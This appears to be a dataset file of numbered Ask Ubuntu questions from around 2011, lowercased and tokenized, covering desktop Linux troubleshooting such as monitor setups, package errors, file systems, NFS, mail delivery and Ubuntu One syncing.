63192	dual monitor setup can cause boot problem ?	i have a two monitor setup , one 22 '' ( 1680x1050 res. , 16:10 ) and another 19 '' ( 1280x1024 res . 5:4 ) . i 've installed ubuntu 11.10 beta2 x86 , and the installation worked fine , the system boot was successful . i 've upgraded ubuntu from the main server , and after restart , booting with the kernel 3.0.0-13 , my system hangs up with a purple screen , and than nothing happens ( the system boots successful with the kernel image 3.0.0-8 ) . nvidia current drivers not installed , but if i install it , the situation is the same . i have an nvidia 9600gt installed . i tried to boot with one screen attached , i 've tried each port , but no luck at all . with kernel image 3.0.0-8 the system successfully boots with each display attached , but the farther kernels ( 3.0.0-11 ; 3.0.0-12 ; ect . ) all freezes , even one display , or multiple attached . i have two systems with ubuntu installed , and the other ( with ati hd 2400xt , latest closed drivers ) do n't have any issues like this , i wrote about . update : the problem solved by reinstalling the operatin system , without automatically installing updates during install , with only one monitor attached . after completing installation , and clean reboot , i 've installed closed nvidia drivers . after all , i found it 's safe to connect another monitor to the system , it 's not causing any problems . probably the situation stays like this .
63195	facebook in online accounts	i have g-mail configured in online accounts . but when trying to add other accounts , such as facebook and linkedin , i am not able to do so , since the account type i am able to select is only google . is there a way to add facebook account type to online accounts ? if yes , can you please guide me to the proper steps ?
63202	can i stop apps from selecting `` recently used '' by default in file chooser dialogs ?	in ubuntu and kubuntu 11.10 i see changes in behaviour of gtk file chooser dialog . when i try to open new file ( second , third etc , not first in editor ) dialog show `` recenty used '' section . it is very unsuitable for me , in 10.04 dialog shows folder where located previous open file . anybody knows how i can bring back old behaviour ?
63207	dual monitor problem on disconnect	i 'm using a dual monitor setup on a samsung qx412 laptop . my external monitor is connected via hdmi . i am not using the additional nvidia drivers.ubuntu uses gnome 2 when i install them , so they do n't seem to work for my configuration . dual monitors work fine , but trouble arises when i unplug the hdmi cable : on first unplug nothing happens - the external montor goes black of course , but i still can go through the edge of the screen . when i reconnect and disconnect a second time , things work as expected most of the time - windows being resized and transferred to my laptops display . on something like every third disconnect of the external monitor , the laptop screen will just go black , or display orange stripes . in very few cases the display can be restored by switching between ctrl+alt+f1 and ctrl+alt+f7 . having the `` monitor preferences '' dialog open will sometimes help to restore a broken display . reconnecting the external monitor is the same pain . does anyone have any idea how i could get this to work ? i 'd even be okay with a shortcut that tells my display manager , `` hey , you 're broken - restart yourself '' . but the old ctrl+alt+backspace shortcut does n't work any more .
63211	ubuntu one not syncing	i am really starting to despair as i have been trying ubuntu one for several months , trying it on several machines , and it has caused me loads of different issues wasting me a lot of time . it is not straight forward to use , it should be a piece of software that runs in background and users should not think about checking all the time if it is really doing it 's job . of course i have been searching around this website and other forums but could n't find an answer to my situation . yesterday i had several problems with the client not syncing and using a lot of the machine 's ram , up and cpu . i had to reboot on several occasions and leave the office 's pc on overnight in order to sync a few files of not more than a few mb . today i am experiencing another problem : i have decided to do a test putting a small file in my ubuntu one shared folder . ubuntu one is not detecting it ( now already more than an hour ) , therefore not uploading it to the server . martin @ ubuntu-desktop : ~ $ u1sdtool -- status state : queue_manager connection : with user with network description : processing the commands pool is_connected : true is_error : false is_online : true queues : idle and martin @ ubuntu-desktop : ~ $ u1sdtool -- current-transfers current uploads : 0 current downloads : 0 i am running ubuntu 11.04 64 with all recent updates . on my other machine the transfer of files seems to be completely frozen , with around 10 files in the queue but no transfer whatsoever . another curious issue is on my ubuntu 10.10 laptop where ubuntu one seems to have completely disappeared from nautilus context menu , folder/file sync status icons missing . i have therefore been forced to upgrade to 11.04 on this machine . anyway , now i would like to solve the processing the commands pool issue and make sure the client
63212	error while downloading youtube videos from terminal	i installed youtube-dl very recently and when i tried to download a particular video using its url as ( youtube-dl url ) , the following error occured : error `` no fmt_url_map or conn information found in video info '' with specific video my youtube-dl version : 2011.01.30
63217	can i create an installer for a proprietary game ?	neverwinter nights is a game by bioware . they have released a linux version which is inconvenient to install . it 's nothing more than copying stuff around but it can be messed up . the game files can be downloaded on their website but require your serial key to run the game . this can be bought online if you do not have the cd-version of the game ( windows only ) . i tried and failed in creating a .deb package ( never done that before ) to automate this and am now interested in using quickly to create a gui version ubuntu installer for neverwinter nights . if possible , i would link to the `` buy serial key online '' url directly from the gui installer . if i am successful i would like to see this in the ubuntu software center . having a highly popular classic rpg in there can not hurt . i am not sure if this is prohibited by copyright laws and if i should even bother with it if it is . what do you think ?
63219	how to change default dash home name ?	is there is any possibility for ubuntu 12.04 to change default `` dash home '' name to what ever .
63220	having a problem to send message to gmail from our mail server	we use ubuntu server and in a days i have installed and configured postfix+dovecot+mysql as it is explained here . from that tutorial i escaped creating certificates and antispam application . right now it works good but when i try to send an email to gmail i am getting back my email with following content : reporting-mta : dns ; ns1 x-postfix-queue-id : 19fdd1ea1826 x-postfix-sender : rfc822 ; johnsmith @ index.tj arrival-date : tue , 27 sep 2011 14:05:35 +0500 ( tjt ) final-recipient : rfc822 ; johnsmith @ gmail.com original-recipient : rfc822 ; johnsmith @ gmail.com action : failed status : 5.7.1 remote-mta : dns ; gmail-smtp-in.l.google.com diagnostic-code : smtp ; 550-5.7.1 [ 217.11.179.46 1 ] our system has detected an unusual rate of 550-5.7.1 unsolicited mail originating from your ip address . to protect our 550-5.7.1 users from spam , mail sent from your ip address has been blocked . 550-5.7.1 please visit http : //www.google.com/mail/help/bulk_mail.html to review 550 5.7.1 our bulk email senders guidelines . w3si6844977eej.200 our system has detected an unusual rate of 550-5.7.1 unsolicited mail originating from your ip address . i tried to send to another outside domain and my email had been sent successfully . what can i do to resolve this problem ?
63224	what should i rely on lbzip2 or pbzip2 ?	as bzip2 claims to compress best ( in size ) , i decided to use it . the working server can offer 24 ( virtuals ) cpus ( 4 real x5650 @ 2.67ghz ) - and thus i decided to look for parallel variants . using debian stable - sorry , but i found best matches here in askubuntu - i decided to take a closer look at pbzip2and lbzip2 . but what to select ? in actual stable pbzip2 is in version 1.1.1-1and lbzip2 in version 0.23-1 . that might cosmetically tend to pbzip2 - but lbzip2 says it is even on single-core computers faster . on the other hand pbzip2 claims to be completely compatible with bzip2 v1.0.2 . additionally i have some timing-values of a big local job : using lbzip2 command being timed : `` tar -cjf /tmp/mapletasicherung.lbzip2.tar /bin /etc /lib /lib32 /opt /sbin /selinux /usr '' user time ( seconds ) : 2134.32 system time ( seconds ) : 39.24 percent of cpu this job got : 2099 % elapsed ( wall clock ) time ( h : mm : ss or m : ss ) : 1:43.51 average shared text size ( kbytes ) : 0 average unshared data size ( kbytes ) : 0 average stack size ( kbytes ) : 0 average total size ( kbytes ) : 0 maximum resident set size ( kbytes ) : 1509088 average resident set size ( kbytes ) : 0 major ( requiring i/o ) page faults : 0 minor ( reclaiming a frame ) page faults : 1054467 voluntary context switches : 153901 involuntary context switches : 235285 swaps : 0 file system inputs : 0 file system outputs : 3460632 socket messages sent : 0 socket messages received : 0 signals delivered : 0 page size ( bytes ) : 4096 exit status : 0 using pbzip2 command being timed : `` tar -cjf /tmp/mapletasicherung.pbzip2.tar /bin /etc /lib /lib32 /opt /sbin /selinux /usr '' user time ( seconds ) : 3158.18 system time ( seconds ) : 59.80 percent of cpu this job got : 2095 % elapsed ( wall clock ) time ( h : mm : ss or m : ss ) : 2:33.56 average shared text size ( kbytes ) : 0 average unshared data size ( kbytes ) : 0 average stack size ( kbytes ) : 0 average total size ( kbytes ) : 0 maximum resident set size ( kbytes ) : 1436320 average resident set size ( kbytes ) : 0 major ( requiring i/o ) page faults : 0 minor ( reclaiming a frame ) page faults : 477683 voluntary context switches : 151326 involuntary context switches : 339246 swaps : 0 file system inputs : 0 file system outputs : 3460536 socket messages sent : 0 socket messages received : 0 signals delivered : 0 page size ( bytes ) : 4096 exit status : 0 what should one use ? what are the major differences ? at the moment i tend towards lbzip2 .
63226	pc shuts down when installing ubuntu ?	i 'm now using ubuntu from usb , and i 'd like to install ubuntu on my hard disk . i tried the option of removing vista while installing ubuntu . however , near the end of the installation process ( presumably the end because i can see some slideshows on how to start using ubuntu ) , the screen suddenly goes to black with white words running around on it . soon the computer shuts down . after that , restarting leads to a black screen with only a small white cursor on the top left corner . the cursor keeps blinking and nothing happens . i found that i can alternatively choose to boot with usb by hitting f12 just when the computer starts . so i tried to reinstall ubuntu by running ubuntu on usb . one of the options of installation is to update ubuntu 11.04 to ubuntu 11.04 , so it seems the ubuntu is already installed somehow . anyways , i tried both update and delete and install option but the same thing happens as the 1st time ( sometimes before reaching the end ) , while i still can not start my pc as ubuntu ( without usb ) . how may i install ubuntu properly ?
63227	can i develop ubuntu apps in gambas	as this new platform is released where developers can publish there apps , i would like to know if gambas applications are good enough to submit . gambas is in my opinion the easiest way to develop applications for linux with a very flat learning curve . why use only `` quickly '' ? i think gambas should also be mentioned on the website . are there ways can i submit an application created in gambas ?
63229	unable to load live usb	i have created a bootable usb with ubuntu 10.10 with usb-creator-gtk from terminal . how ever it is not getting booted . it keeps loading in the ubuntu main screen.. is there a way to debug this problem and find the cause ?
63230	will it be possible to use gtk3.2 's html5 extension in 11.10 ?	does anybody know wether or not it willbe possible to use the gtk3.2 's new html5-extension in ubuntu 11.10 ? they announced that gnome3.2 will be included , but will they build the gtk packages with the new html5-extension enabled ?
63231	zeitgeist-daemon excessive ram usage	i have installed last week ubuntu 11.04 64 on a new machine . i am running the gui using unity . however i have noticed that after 1-2 hours the process zeitgeist-daemon starts using excessively the machine 's memory . up to 800 - 1000 mb ! i am having the same issue on another machine where i used to run ubuntu 11.04 for several months without problems until using gnome . the last few days i have changed to unity and the exact same problem occurs . i am forced to kill the process otherwise i am unable to keep working with the machines . should i file a bug ?
63232	change directory to an external disk	i 've two partitions on my windows os and i 've installed ubuntu within windows . partition 1 : windows and linux os partition 2 : common storage files ( called under the name new volume ) i am looking at running a shell script that is placed in partition 2 . i am able to run the shell when it is placed in the /home/ ... hierarchy of ubuntu but i am unable to do so when it is placed in partition 2 which is being treated as an external disk by the os . i just want to know how can i actually change my working directory to a directory that is placed on an external disk which is mounted . what is the cd command to make the terminal look into a directory of the mounted disk ?
63240	ntfs - > ext4 migration , where did 120 gb go ?	wim @ wim-ubuntu : ~/desktop $ mount | grep media /dev/sdc1 on /media/data type ext4 ( rw , nosuid , nodev , uhelper=udisks ) /dev/sdb1 on /media/wd type fuseblk ( rw , nosuid , nodev , allow_other , blksize=4096 , default_permissions ) wim @ wim-ubuntu : ~/desktop $ df | grep media /dev/sdc1 1922858352 1824822680 360072 100 % /media/data /dev/sdb1 1953512000 1825392384 128119616 94 % /media/wd wim @ wim-ubuntu : ~/desktop $ df -h | grep media /dev/sdc1 1.8t 1.7t 352m 100 % /media/data /dev/sdb1 1.9t 1.8t 123g 94 % /media/wd i am moving my data from an ntfs drive to an ext4 drive . on the ntfs volume i had 122.2 gb free , then after copying with rsync ( excluding a couple of unneeded ntfs files in system volume information ) , i have only 351.6 mb free . the hard disks are identical wd 2tb drives . i created the ext4 partition with gparted , is there any reason why the ext4 would have 30653648 less blocks on it ? output of sudo fdisk -l : disk /dev/sdc : 2000.4 gb , 2000397852160 bytes 255 heads , 63 sectors/track , 243201 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00bb4cbc device boot start end blocks id system /dev/sdc1 1 243201 1953512001 83 linux disk /dev/sdb : 2000.4 gb , 2000397852160 bytes 255 heads , 63 sectors/track , 243201 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xcefa6110 device boot start end blocks id system /dev/sdb1 1 243201 1953512001 7 hpfs/ntfs
63245	kubuntu 10.04 + ppa : kubuntu-ppa/backports - is it really stable enough ?	i have kubuntu 10.04 32bit . i 'm having some problems with some kde apps . i have read around that installing the updates from the ppa : kubuntu-ppa/backports would help . i know that the kubuntu ppa are unofficial ubuntu repo but are directly maintained by the kubuntu team , to provide important updates to the kubuntu users https : //wiki.kubuntu.org/kubuntu/kubuntuppas https : //help.ubuntu.com/community/repositories/kubuntu i 'd like to know from other people that have kubuntu 10.04 + ppa : kubuntu-ppa/backports . is this solution working really well ? is it stable enough ? i 'm confused 'cause if i add the repository , and take a look on what an update what do , i have different results if i check with kpakagekit or with aptitude packagekit update 116 packages 26 packages will be marked as blocked ( network-manager kdebase-bin plasma-widgets-workspace ) aptitude 82 packages to install 13 packages to delete ( kdebase-plasma kdepimlibs-data ecc ) 142 packages to update wich program should i use to do this ? aptidude ore kpackagekit ?
63246	possible data loss while installing ubuntu 11.04 over ubuntu 10.10	i have ubuntu 10.10 install on my laptop . and i have a lot of data ( nealy 40 gb ) in the partition where linux is installed . i can not move this data to some where else . if i now try to install ubuntu 11.04 via usb ( i am avoiding upgrading via package manager because i have had some bad experiences with it ) , and not 'format ' my linux partition , are there any chances that my data in /home or /home/user1 or /home/user2 will vanish away ?
63250	how to set environmental variable path ?	i 'm using ubuntu 10.10 and downloaded jdk7 from java.sun.com . that jdk is a compressed file and on extraction there i got all the files and folders of jdk1.7.0 . but now if i tries to compile a java program than there is an error that javac not found . how could i set path of jdk1.7.0\bin to use javac everywhere ?
63251	horrible tk/wish fonts	this is how gitk - which is based on tk/wish - looks on my fresh 11.04 installation : are there any better fonts that tk/wish can use by default ?
63258	apt-get returning 'sub-process /usr/bin/dpkg returned an error code ( 1 ) '' error	i am facing a problem while installing any program . i get an error of sub-process /usr/bin/dpkg returned an error code ( 1 ) . following is log of the output of apt-get -f install i am using ubuntu 10.10 on dell inspiron 1564 and wireless driver : sta wireless driver . any idea what 's wrong with my package manager ? tahir @ tahir-inspiron-1564 : /var/www $ sudo apt-get -f install [ sudo ] password for tahir : reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 24 not upgraded . 5 not fully installed or removed . after this operation , 0b of additional disk space will be used . setting up linux-image-2.6.35-27-generic ( 2.6.35-27.48 ) ... running depmod . update-initramfs : generating /boot/initrd.img-2.6.35-27-generic examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/dkms 2.6.35-27-generic /boot/vmlinuz-2.6.35-27-generic * dkms : running auto installation service for kernel 2.6.35-27-generic * bcmwl ( 5.60.48.36+bdcom ) ... [ ok ] run-parts : executing /etc/kernel/postinst.d/initramfs-tools 2.6.35-27-generic /boot/vmlinuz-2.6.35-27-generic run-parts : executing /etc/kernel/postinst.d/nvidia-common 2.6.35-27-generic /boot/vmlinuz-2.6.35-27-generic run-parts : executing /etc/kernel/postinst.d/pm-utils 2.6.35-27-generic /boot/vmlinuz-2.6.35-27-generic run-parts : executing /etc/kernel/postinst.d/update-notifier 2.6.35-27-generic /boot/vmlinuz-2.6.35-27-generic run-parts : executing /etc/kernel/postinst.d/zz-update-grub 2.6.35-27-generic /boot/vmlinuz-2.6.35-27-generic generating grub.cfg ... found linux image : /boot/vmlinuz-2.6.35-30-generic found initrd image : /boot/initrd.img-2.6.35-30-generic found linux image : /boot/vmlinuz-2.6.35-28-generic found initrd image : /boot/initrd.img-2.6.35-28-generic found linux image : /boot/vmlinuz-2.6.35-27-generic found initrd image : /boot/initrd.img-2.6.35-27-generic found linux image : /boot/vmlinuz-2.6.35-25-generic found initrd image : /boot/initrd.img-2.6.35-25-generic found linux image : /boot/vmlinuz-2.6.35-22-generic found initrd image : /boot/initrd.img-2.6.35-22-generic found linux image : /boot/vmlinuz-2.6.32-28-generic found initrd image : /boot/initrd.img-2.6.32-28-generic found linux image : /boot/vmlinuz-2.6.32-27-generic found initrd image : /boot/initrd.img-2.6.32-27-generic found linux image : /boot/vmlinuz-2.6.32-21-generic found initrd image : /boot/initrd.img-2.6.32-21-generic found memtest86+ image : /boot/memtest86+.bin found windows 7 ( loader ) on /dev/sda2 /etc/grub.d/readme : 2 : all : not found /etc/grub.d/readme : 4 : 00_* : : not found /etc/grub.d/readme : 5 : 10_* : : not found /etc/grub.d/readme : 6 : syntax error : `` ( `` unexpected run-parts : /etc/kernel/postinst.d/zz-update-grub exited with return code 2 failed to process /etc/kernel/postinst.d at /var/lib/dpkg/info/linux-image-2.6.35-27-generic.postinst line 1010. dpkg : error processing linux-image-2.6.35-27-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 2 setting up linux-image-2.6.35-28-generic ( 2.6.35-28.50 ) ... running depmod . update-initramfs : generating /boot/initrd.img-2.6.35-28-generic examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/dkms 2.6.35-28-generic /boot/vmlinuz-2.6.35-28-generic * dkms : running auto installation service for kernel 2.6.35-28-generic * bcmwl ( 5.60.48.36+bdcom ) ... [ ok ] run-parts : executing /etc/kernel/postinst.d/initramfs-tools 2.6.35-28-generic /boot/vmlinuz-2.6.35-28-generic run-parts : executing /etc/kernel/postinst.d/nvidia-common 2.6.35-28-generic /boot/vmlinuz-2.6.35-28-generic run-parts : executing /etc/kernel/postinst.d/pm-utils 2.6.35-28-generic /boot/vmlinuz-2.6.35-28-generic run-parts : executing /etc/kernel/postinst.d/update-notifier 2.6.35-28-generic /boot/vmlinuz-2.6.35-28-generic run-parts : executing /etc/kernel/postinst.d/zz-update-grub 2.6.35-28-generic /boot/vmlinuz-2.6.35-28-generic generating grub.cfg ... found linux image : /boot/vmlinuz-2.6.35-30-generic found initrd image : /boot/initrd.img-2.6.35-30-generic found linux image : /boot/vmlinuz-2.6.35-28-generic found initrd image : /boot/initrd.img-2.6.35-28-generic found linux image : /boot/vmlinuz-2.6.35-27-generic found initrd image : /boot/initrd.img-2.6.35-27-generic found linux image : /boot/vmlinuz-2.6.35-25-generic found initrd image : /boot/initrd.img-2.6.35-25-generic found linux image : /boot/vmlinuz-2.6.35-22-generic found initrd image : /boot/initrd.img-2.6.35-22-generic found linux image : /boot/vmlinuz-2.6.32-28-generic found initrd image : /boot/initrd.img-2.6.32-28-generic found linux image : /boot/vmlinuz-2.6.32-27-generic found initrd image : /boot/initrd.img-2.6.32-27-generic found linux image : /boot/vmlinuz-2.6.32-21-generic found initrd image : /boot/initrd.img-2.6.32-21-generic found memtest86+ image : /boot/memtest86+.bin found windows 7 ( loader ) on /dev/sda2 /etc/grub.d/readme : 2 : all : not found /etc/grub.d/readme : 4 : 00_* : : not found /etc/grub.d/readme : 5 : 10_* : : not found /etc/grub.d/readme : 6 : syntax error : `` ( `` unexpected run-parts : /etc/kernel/postinst.d/zz-update-grub exited with return code 2 failed to process /etc/kernel/postinst.d at /var/lib/dpkg/info/linux-image-2.6.35-28-generic.postinst line 1010. dpkg : error processing linux-image-2.6.35-28-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 2 setting up linux-image-2.6.35-30-generic ( 2.6.35-30.59 ) ... running depmod . update-initramfs : generating /boot/initrd.img-2.6.35-30-generic examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/dkms 2.6.35-30-generic /boot/vmlinuz-2.6.35-30-generic * dkms : running auto installation service for kernel 2.6.35-30-generic * bcmwl ( 5.60.48.36+bdcom ) ... [ ok ] run-parts : executing /etc/kernel/postinst.d/initramfs-tools 2.6.35-30-generic /boot/vmlinuz-2.6.35-30-generic run-parts : executing /etc/kernel/postinst.d/nvidia-common 2.6.35-30-generic /boot/vmlinuz-2.6.35-30-generic run-parts : executing /etc/kernel/postinst.d/pm-utils 2.6.35-30-generic /boot/vmlinuz-2.6.35-30-generic run-parts : executing /etc/kernel/postinst.d/update-notifier 2.6.35-30-generic /boot/vmlinuz-2.6.35-30-generic run-parts : executing /etc/kernel/postinst.d/zz-update-grub 2.6.35-30-generic /boot/vmlinuz-2.6.35-30-generic generating grub.cfg ... found linux image : /boot/vmlinuz-2.6.35-30-generic found initrd image : /boot/initrd.img-2.6.35-30-generic found linux image : /boot/vmlinuz-2.6.35-28-generic found initrd image : /boot/initrd.img-2.6.35-28-generic found linux image : /boot/vmlinuz-2.6.35-27-generic found initrd image : /boot/initrd.img-2.6.35-27-generic found linux image : /boot/vmlinuz-2.6.35-25-generic found initrd image : /boot/initrd.img-2.6.35-25-generic found linux image : /boot/vmlinuz-2.6.35-22-generic found initrd image : /boot/initrd.img-2.6.35-22-generic found linux image : /boot/vmlinuz-2.6.32-28-generic found initrd image : /boot/initrd.img-2.6.32-28-generic found linux image : /boot/vmlinuz-2.6.32-27-generic found initrd image : /boot/initrd.img-2.6.32-27-generic found linux image : /boot/vmlinuz-2.6.32-21-generic found initrd image : /boot/initrd.img-2.6.32-21-generic found memtest86+ image : /boot/memtest86+.bin found windows 7 ( loader ) on /dev/sda2 /etc/grub.d/readme : 2 : all : not found /etc/grub.d/readme : 4 : 00_* : : not found /etc/grub.d/readme : 5 : 10_* : : not found /etc/grub.d/readme : 6 : syntax error : `` ( `` unexpected run-parts : /etc/kernel/postinst.d/zz-update-grub exited with return code 2 failed to process /etc/kernel/postinst.d at /var/lib/dpkg/info/linux-image-2.6.35-30-generic.postinst line 1010. dpkg : error processing linux-image-2.6.35-30-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 2 dpkg : dependency problems prevent configuration of linux-image-generic : linux-image-generic depends on linux-image-2.6.35-30-generic ; however : package linux-image-2.6.35-30-generic is not configured yet . dpkg : error processing linux-image-generic ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-generic : linux-generic depends on linux-image-generic ( = 2.6.35.30.38 ) ; however : package linux-image-generic is not configured yet . dpkg : error processing linux-generic ( -- confno apport report written because maxreports is reached already no apport report written because maxreports is reached already igure ) : dependency problems - leaving unconfigured errors were encountered while processing : linux-image-2.6.35-27-generic linux-image-2.6.35-28-generic linux-image-2.6.35-30-generic linux-image-generic linux-generic e : sub-process /usr/bin/dpkg returned an error code ( 1 )
63260	how can i block a range of ipv6 addresses ?	are there any ip blocking applications or firewalls that support ipv6 ? the ones i know about ( pgld , moblock ( sunset ? ) , nfblock , iplist ( looks old ) ) are only for ipv4 .
63261	ca n't access nfs3 shares	unable to access nfs shares on ubuntu from windows 7 . it just acts like the share ca n't be found on network . ( net help msg 1222 ) on client : added nfs features tried `` mount ip : /share z : '' and the gui drive mapping tried with and without `` anonymousuid '' '' anonymousgid '' dwords under hklm\software\microsoft\clientfornfs\currentversion\default on server : exportfs lists the shares . mount shows `` nfsd on /proc/fs/nfsd type nfsd ( rw ) '' ( i think that 's normal ? ! ? ) have experimented with many options in : /etc/exports /etc/default/nfs-kernel-server /etc/default/nfs-common tried forcing no nfs v 4 after each change i 'm restarting nfs service and re-exporting i 've been trying to figure this out forever . any help would be much appreciated !
63264	unsupported video chipset - how do i force low-graphics mode ?	i 'm a ubuntu noobie - but i got my laptop dual-booted with xp and ubuntu 11.04 , with all updates installed . i have a dell inspiron 5160 with an xgi volari xp5 video card . it supports 640x480 - 32/16/8 bit color , 800x600 - 32/16/8 bit color , and 1024x768 - 32/16/8 bit color . i 'm pretty sure this is an unsupported chipset for linux . but , the low-graphics mode works fine when i boot in recovery mode . how can i set this as my standard video configuration ?
63265	touchpad scroll not working on acer aspire one	i just installed ubuntu netbook version 10.04 lts on an acer aspire one and it works perfectly , but for some reason i 'm not allowed to use the little scrollpad at the side of the trackpad to scroll like i would on windows . i checked the settings and it appears to be enabled there , so do i need to install any extra drivers ?
63270	how do i download a youtube video ?	for a school project i need to download three youtube videos and save them to a cd . i am running ubuntu 10.10 ; can anybody provide instructions on how to do this ? i 'm fairly new to ubuntu so the more detail the better .
63281	ubuntu 11.04 does not recognize external projector	i have tried to use an external projector at work , which works alright with the same laptop on windows . as i am not very skilled in computers , so i am just kind of freaking out . could you give me some help ?
63283	logitech g300 , not working on ubuntu	the mouse logitech g300 is not working on ubuntu ( i 'm using ubuntu 11.04 x64 ) . left click is resulting in random click/movements and it 's not an hardware issue , because it 's working on windows . maybe a driver issue ? i noticed somebody is having the same problem : http : //logs.ubuntu-eu.org/freenode5/2011/09/18/ % 23ubuntu-bugs.html any ideas ?
63285	is it possible to prioritize which folders get synced first when using ubuntu one ?	i face the problem that u1 syncs my files to a given order . i 'd like to change that order . consider that : on a week end i work and i may also copy the content of my photo sd card onto my notebook . the next time i boot my work computer , i might be sitting there and waiting for some hours until u1 synced/downloaded all the photos to my workstation and the files i need for work are the last in the ' -- waiting ' list . i do n't mind if ubuntu one is a slow downloader , i would be just happy if i could define that all files in a certain folder ( and all of it subfolders ) always need to be downloaded first . i 'm aware that there was once the possibility to move some files to the beginning of the sync list . but that was a very clumsy way with providing the folder id etc . and in the current version of u1 i ca n't even find it any more . any suggestions on how to prioritize always the same folder ?
63288	how can i make nautilus use my installed fuse file systems automatically ?	is there a way to have nautilus automatically use my fuse file systems to ( for example ) open isos as folders , or archives as folders , or what ever other 'locations ' fuse supports ?
63298	installing unity on 10.04 for netbooks	i have installed ubuntu 10.04 lts netbook version and it comes with an annoying user interface . i 'd like to know how i can replace it with unity . i 've already tried sudo apt-get install unity but it comes up with an error saying that the package named unity ca n't be found . looking on google i could n't find any more help on the subject . ( before you ask me why i have n't installed 11.04 , that 's because it would not start up from the live cd at all )
63309	how do i remove drivers from the blacklist ?	i have a computer with a nvidia geforce go 7400 graphics chip , and it has the same problem with the 7300 - unity wo n't work with it because it is blacklisted . i use unity_force_start=1 to get unity and compiz running , and they work fabulously , but unfortunately , it prevents me from working in classic gnome two ( what happens is both unity and gnome 2 come up and display stuff , and it is all jumbled up ) . i read somewhere that it would be fixed in 11.10 , but i still want to be able to use gnome 2 now . so is there any way to : remove the driver from the blacklist , and getting compiz and such work without it being forced to start . also , the bug is going to be fixed in oneiric right ?
63314	what fanless ati radeon cards work with the open-source drivers ?	i am building four intel core i5 desktop systems . the systems should run ubuntu 10.04 lts and be used for watching hd movies , youtube etc . not for gaming . i want to use fanless ati radeon cards and the open source driver . what fanless ati radeon graphics cards are well supported by the open source driver ( s ) and ubuntu 10.04 lts ?
63319	how to run kvm/qemu on a virtual terminal with kms enabled	i deduce from the kvm howtos that this should actually work with sdl and a framebuffer , but i ca n't get it going . doing kvm -cdrom tinycore-current.iso with normal user account on a virtual terminal gives : kvm : pci_add_option_rom : failed to find romfile `` pxe-rtl8139.bin '' init kbd . init mouse failed . could not initialize sdl ( unable to open mouse ) - exiting while it works flawlessly under x . running it with sudo prepended crashes display and keyboard . so what can i do ?
63320	how can i move the default chromium profile ?	i 've installed a modified version of chromium ( nickel-browser ) that ca n't open my profile , because of version issues . nickel is currently running on a temporary profile and constantly warning me . what files do i need to move/rename to allow it to make its own default profile ?
63321	invalid random wallpaper directory in awsetbg	i 'm using the awesome wm and awsetbg to draw the background . suddenly , for a mysterious reason , it does n't work ( awsetbg /some/file.jpg ) , and when i try to get it to use a random directory ( awsetbg -r /path/to/pics/dir ) it says `` invalid random wallpaper directory . '' why is that , and how can i fix it ? the directory does n't contain anything but image files . update : i tried both awsetbg -r ~/pictures and awsetbg -r /usr/share/backgrounds , but neither work .
63322	what to use to monitor mysql for corrupted tables ?	what is a good program to monitor mysql tables for corruption , one that would email me as soon as there is a corrupted table ? i 'm not looking for mysql workbench or admin to manage the database . but one that will actively monitor the tables and email reports .
63324	hidden accounts	when you start up ubuntu , it displays the usernames you can log on as as well as an `` other '' option , where you are then prompted to type in the username . is there a way to set up an account so that it does n't show up on the list , but can be reached through the other option ?
63325	removed libgcrypto and some other essential packages , how do i reinstall them ?	while removing libgcrypto package , i apparently removed a lot of critical dependencies with it . now i do n't have access to the gui , just to a tty . my problem is how to get those packages missing . i ca n't seem to access to internet and do n't have a cd to boot from . i have a external hd with ubuntu iso which i can mount . i was wondering if it is possible to get those packages that are missing after mounting it . or if there is a more ingenious option . thanks
63326	running ubuntu using virtualbox , am i missing anything experience wise ?	when running ubuntu using virtual box in full screen mode , is there anything i am missing in terms of the ubuntu experience ? ( i guess this would be mostly graphic wise ) i understand performance might be a tad laggy depending on the system , but i 'm on a pretty powerful system .
63327	pdf viewer with `` gmail-sendable annotation '' and `` color inversion '' ?	is there a free pdf viewer with the following properties ? -it can annotate . -annotation will be preserved when the document is sent by gmail . -color inversion ( evince has it ) or color setting .
63329	does xfce4 's panel support the indicator-application menu ?	does xfce4-panel currently have a support for global menu , not the gnome2-globalmenu project , but the indicator 's appmenu , which runs well on gnome-panel . i installed gnome-panel on xubuntu , but the indicator menu wo n't show on xfce4-panel .
63332	how can i downgrade to an older opera version ?	i once installed opera by adding their repository to my sources.list : deb http : //deb.opera.com/opera/ stable non-free # opera since then i get regular updates via the usual `` apt-get update & & apt-get upgrade '' , the last some weeks ago to opera 11.51 . since then , opera regularly ( once every some days , sometimes more often ) crashes ( browser window disappears , and then the error reporting dialog comes up ) . ( the same happens on opensuse , where i had the upgrade last week , thus it is not ubuntu-specific . ) this just occurred again ( while i was typing an answer to a question on another stack exchange site ) and i do n't want to tolerate it any longer . is there an easy way to downgrade to an older version ( like 11.50 , which did n't had this problem ) , and still have the possibility to get the upgrade query when the next version comes out ( which hopefully fixes this ) ?
63342	unity equivalent to the gnome 2 system monitor	i 'm using gnome 2 right now and looking to switch to unity , but one thing that i really miss is the old gnome 2 system monitor : i found something like this for kde , but the bars were really thin and did n't give a good idea of the recent history of some system 's usage . is there something like this that i can embed in one of the taskbars in unity ? failing that , is there something like this for any desktop environment other than gnome 2 ?
